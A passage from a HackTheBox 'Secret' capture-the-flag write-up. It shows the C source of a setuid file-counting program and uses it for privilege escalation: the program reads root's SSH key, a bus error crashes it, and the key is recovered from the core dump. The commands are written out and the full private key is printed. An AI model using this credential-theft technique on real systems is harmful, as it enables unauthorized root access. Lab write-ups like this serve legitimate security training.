    <span class="k">struct</span> <span class="n">stat</span> <span class="n">fstat</span><span class="p">;</span>

    <span class="kt">int</span> <span class="n">tot</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">regular_files</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">directories</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">symlinks</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="k">if</span><span class="p">((</span><span class="n">dir</span> <span class="o">=</span> <span class="n">opendir</span><span class="p">(</span><span class="n">path</span><span class="p">))</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Unable to open directory.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">while</span> <span class="p">((</span><span class="n">ent</span> <span class="o">=</span> <span class="n">readdir</span><span class="p">(</span><span class="n">dir</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="o">++</span><span class="n">tot</span><span class="p">;</span>
        <span class="n">strncpy</span><span class="p">(</span><span class="n">fullpath</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">PATH_MAX</span><span class="o">-</span><span class="n">NAME_MAX</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="n">strcat</span><span class="p">(</span><span class="n">fullpath</span><span class="p">,</span> <span class="s">"/"</span><span class="p">);</span>
        <span class="n">strncat</span><span class="p">(</span><span class="n">fullpath</span><span class="p">,</span> <span class="n">ent</span><span class="o">-&gt;</span><span class="n">d_name</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">ent</span><span class="o">-&gt;</span><span class="n">d_name</span><span class="p">));</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">lstat</span><span class="p">(</span><span class="n">fullpath</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">fstat</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="k">if</span><span class="p">(</span><span class="n">S_ISDIR</span><span class="p">(</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span><span class="p">))</span>
            <span class="p">{</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"d"</span><span class="p">);</span>
                <span class="o">++</span><span class="n">directories</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="n">S_ISLNK</span><span class="p">(</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span><span class="p">))</span>
            <span class="p">{</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"l"</span><span class="p">);</span>
                <span class="o">++</span><span class="n">symlinks</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="n">S_ISREG</span><span class="p">(</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span><span class="p">))</span>
            <span class="p">{</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"-"</span><span class="p">);</span>
                <span class="o">++</span><span class="n">regular_files</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">else</span> <span class="n">printf</span><span class="p">(</span><span class="s">"?"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IRUSR</span><span class="p">)</span> <span class="o">?</span> <span class="s">"r"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IWUSR</span><span class="p">)</span> <span class="o">?</span> <span class="s">"w"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IXUSR</span><span class="p">)</span> <span class="o">?</span> <span class="s">"x"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IRGRP</span><span class="p">)</span> <span class="o">?</span> <span class="s">"r"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IWGRP</span><span class="p">)</span> <span class="o">?</span> <span class="s">"w"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IXGRP</span><span class="p">)</span> <span class="o">?</span> <span class="s">"x"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IROTH</span><span class="p">)</span> <span class="o">?</span> <span class="s">"r"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IWOTH</span><span class="p">)</span> <span class="o">?</span> <span class="s">"w"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
            <span class="n">printf</span><span class="p">((</span><span class="n">fstat</span><span class="p">.</span><span class="n">st_mode</span> <span class="o">&amp;</span> <span class="n">S_IXOTH</span><span class="p">)</span> <span class="o">?</span> <span class="s">"x"</span> <span class="o">:</span> <span class="s">"-"</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">else</span>
        <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"??????????"</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="n">printf</span> <span class="p">(</span><span class="s">"</span><span class="se">\t</span><span class="s">%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ent</span><span class="o">-&gt;</span><span class="n">d_name</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">closedir</span><span class="p">(</span><span class="n">dir</span><span class="p">);</span>

    <span class="n">snprintf</span><span class="p">(</span><span class="n">summary</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="s">"Total entries       = %d</span><span class="se">\n</span><span class="s">Regular files       = %d</span><span class="se">\n</span><span class="s">Directories         = %d</span><span class="se">\n</span><span class="s">Symbolic links      = %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">tot</span><span class="p">,</span> <span class="n">regular_files</span><span class="p">,</span> <span class="n">directories</span><span class="p">,</span> <span class="n">symlinks</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">%s"</span><span class="p">,</span> <span class="n">summary</span><span class="p">);</span>
<span class="p">}</span>


<span class="kt">void</span> <span class="nf">filecount</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">summary</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">FILE</span> <span class="o">*</span><span class="n">file</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">ch</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">characters</span><span class="p">,</span> <span class="n">words</span><span class="p">,</span> <span class="n">lines</span><span class="p">;</span>

    <span class="n">file</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s">"r"</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">file</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Unable to open file.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Please check if file exists and you have read privilege.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">characters</span> <span class="o">=</span> <span class="n">words</span> <span class="o">=</span> <span class="n">lines</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">((</span><span class="n">ch</span> <span class="o">=</span> <span class="n">fgetc</span><span class="p">(</span><span class="n">file</span><span class="p">))</span> <span class="o">!=</span> <span class="n">EOF</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">characters</span><span class="o">++</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">ch</span> <span class="o">==</span> <span class="sc">'\n'</span> <span class="o">||</span> <span class="n">ch</span> <span class="o">==</span> <span class="sc">'\0'</span><span class="p">)</span>
            <span class="n">lines</span><span class="o">++</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">ch</span> <span class="o">==</span> <span class="sc">' '</span> <span class="o">||</span> <span class="n">ch</span> <span class="o">==</span> <span class="sc">'\t'</span> <span class="o">||</span> <span class="n">ch</span> <span class="o">==</span> <span class="sc">'\n'</span> <span class="o">||</span> <span class="n">ch</span> <span class="o">==</span> <span class="sc">'\0'</span><span class="p">)</span>
            <span class="n">words</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">characters</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">words</span><span class="o">++</span><span class="p">;</span>
        <span class="n">lines</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">snprintf</span><span class="p">(</span><span class="n">summary</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="s">"Total characters = %d</span><span class="se">\n</span><span class="s">Total words      = %d</span><span class="se">\n</span><span class="s">Total lines      = %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">characters</span><span class="p">,</span> <span class="n">words</span><span class="p">,</span> <span class="n">lines</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">%s"</span><span class="p">,</span> <span class="n">summary</span><span class="p">);</span>
<span class="p">}</span>


<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span>
    <span class="kt">int</span> <span class="n">res</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">stat</span> <span class="n">path_s</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">summary</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span>

    <span class="n">printf</span><span class="p">(</span><span class="s">"Enter source file/directory name: "</span><span class="p">);</span>
    <span class="n">scanf</span><span class="p">(</span><span class="s">"%99s"</span><span class="p">,</span> <span class="n">path</span><span class="p">);</span>
    <span class="n">getchar</span><span class="p">();</span>
    <span class="n">stat</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">path_s</span><span class="p">);</span>
    <span class="k">if</span><span class="p">(</span><span class="n">S_ISDIR</span><span class="p">(</span><span class="n">path_s</span><span class="p">.</span><span class="n">st_mode</span><span class="p">))</span>
        <span class="n">dircount</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">summary</span><span class="p">);</span>
    <span class="k">else</span>
        <span class="n">filecount</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">summary</span><span class="p">);</span>

    <span class="c1">// drop privs to limit file write</span>
    <span class="n">setuid</span><span class="p">(</span><span class="n">getuid</span><span class="p">());</span>
    <span class="c1">// Enable coredump generation</span>
    <span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_DUMPABLE</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Save results a file? [y/N]: "</span><span class="p">);</span>
    <span class="n">res</span> <span class="o">=</span> <span class="n">getchar</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="mi">121</span> <span class="o">||</span> <span class="n">res</span> <span class="o">==</span> <span class="mi">89</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Path: "</span><span class="p">);</span>
        <span class="n">scanf</span><span class="p">(</span><span class="s">"%99s"</span><span class="p">,</span> <span class="n">path</span><span class="p">);</span>
        <span class="kt">FILE</span> <span class="o">*</span><span class="n">fp</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s">"a"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">fp</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">fputs</span><span class="p">(</span><span class="n">summary</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span>
            <span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"Could not open %s for writing</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">path</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></table></code></div></div><p>The code contains the line <code class="language-plaintext highlighter-rouge">prctl(PR_SET_DUMPABLE, 1);</code> which as a comment tells us enables coredump generation. The program is used to count characters, words and lines in a specific file. We can use this to count root’s ssh key, crash the program which will then do a coredump. We should then be able to read the ssh key of root in the dump since it will be loaded and in the memory of the program.</p><p>We open two shells since we need to be pretty fast in crashing the program. We start by running the program</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="gp">dasith@secret:/opt$</span><span class="w"> </span>./count 
<span class="go">Enter source file/directory name: /root/.ssh/id_rsa

Total characters = 2602
Total words      = 45
Total lines      = 39
Save results a file? [y/N]: y
Path: Bus error (core dumped)
</span></pre></table></code></div></div><p>The contents of the other terminal:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="gp">dasith@secret:~$</span><span class="w"> </span>ps <span class="nt">-aux</span> | <span class="nb">grep </span>count
<span class="go">root         792  0.0  0.1 235664  7516 ?        Ssl  19:28   0:00 /usr/lib/accountsservice/accounts-daemon
root        1719  0.0  0.0   2488   592 pts/1    S+   20:19   0:00 ./count
dasith      1721  0.0  0.0   6432   736 pts/0    S+   20:20   0:00 grep --color=auto count
</span><span class="gp">dasith@secret:~$</span><span class="w"> </span><span class="nb">kill</span> <span class="nt">-BUS</span> 1719
</pre></table></code></div></div><p>We actually didn’t have to be that fast since it stopped the execution of the program so we could enter the path of the file we wanted to save our results in. In any case, we then go to <code class="language-plaintext highlighter-rouge">/var/crash</code> and unpack the coredump: <code class="language-plaintext highlighter-rouge">apport-unpack _opt_count.1000.crash /tmp/crash</code></p><p>going into the new directory where we unpacked the dump, we can then read the coredump and find the ssh-key of root:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
</pre><td class="rouge-code"><pre><span class="go">-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

</span></pre></table></code></div></div><p>Rooted!</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeup/'>Writeup</a>, <a href='/categories/hackthebox/'>HackTheBox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/easy-box/" class="post-tag no-text-decoration" >Easy-box</a> <a href="/tags/jwt/" class="post-tag no-text-decoration" >jwt</a> <a href="/tags/git/" class="post-tag no-text-decoration" >git</a> <a href="/tags/api/" class="post-tag no-text-decoration" >api</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Secret writeup - BitisGabonica&amp;url=https://bitisg.github.io/posts/Secret/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Secret writeup - BitisGabonica&amp;u=https://bitisg.github.io/posts/Secret/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://bitisg.github.io/posts/Secret/&amp;text=Secret writeup - BitisGabonica" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/DroidComp/">DroidComp writeup</a><li><a href="/posts/Faculty/">Faculty writeup</a><li><a href="/posts/Trick/">Trick writeup</a><li><a href="/posts/Seal/">Seal writeup</a><li><a href="/posts/Devzat/">Devzat writeup</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/easy-box/">Easy-box</a> <a class="post-tag" href="/tags/medium-box/">medium-box</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/apk/">apk</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/forensics/">forensics</a> <a class="post-tag" href="/tags/git/">git</a> <a class="post-tag" href="/tags/jwt/">jwt</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Devzat/"><div class="card-body"> <em class="timeago small" data-ts="1655823600" > 2022-06-21 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Devzat writeup</h3><div class="text-muted small"><p> Summary This box focuses a lot on enumeration and source code review. We can abuse an api to achieve remote code execiton on the target system. We can then pivot to a different user via an Authenti...</p></div></div></a></div><div class="card"> <a href="/posts/Unicode/"><div class="card-body"> <em class="timeago small" data-ts="1658062800" > 2022-07-17 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Unicode writeup</h3><div class="text-muted small"><p> Summary This box focuses on exploiting an authentication system using a jwt with an insecure jku parameter. After this, we can do unicode normalization to gain lfi, which will allow us to get a pas...</p></div></div></a></div><div class="card"> <a href="/posts/Panda/"><div class="card-body"> <em class="timeago small" data-ts="1658322000" > 2022-07-20 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>RedPanda writeup</h3><div class="text-muted small"><p> Summary This was actually a pretty tricky box. It starts out with thymeleaf template injection, and ends with a slightly complicated XXE attack to gain root access. Let’s take a look! Foothold We ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Sense/" class="btn btn-outline-primary" prompt="Older"><p>Sense writeup</p></a> <a href="/posts/Shibboleth/" class="btn btn-outline-primary" prompt="Newer"><p>Shibboleth writeup</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/BitisGabonica1">BitisGabonica</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/easy-box/">Easy-box</a> <a class="post-tag" href="/tags/medium-box/">medium-box</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/apk/">apk</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/forensics/">forensics</a> <a class="post-tag" href="/tags/git/">git</a> <a class="post-tag" href="/tags/jwt/">jwt</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-4RZWBJKYF3"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 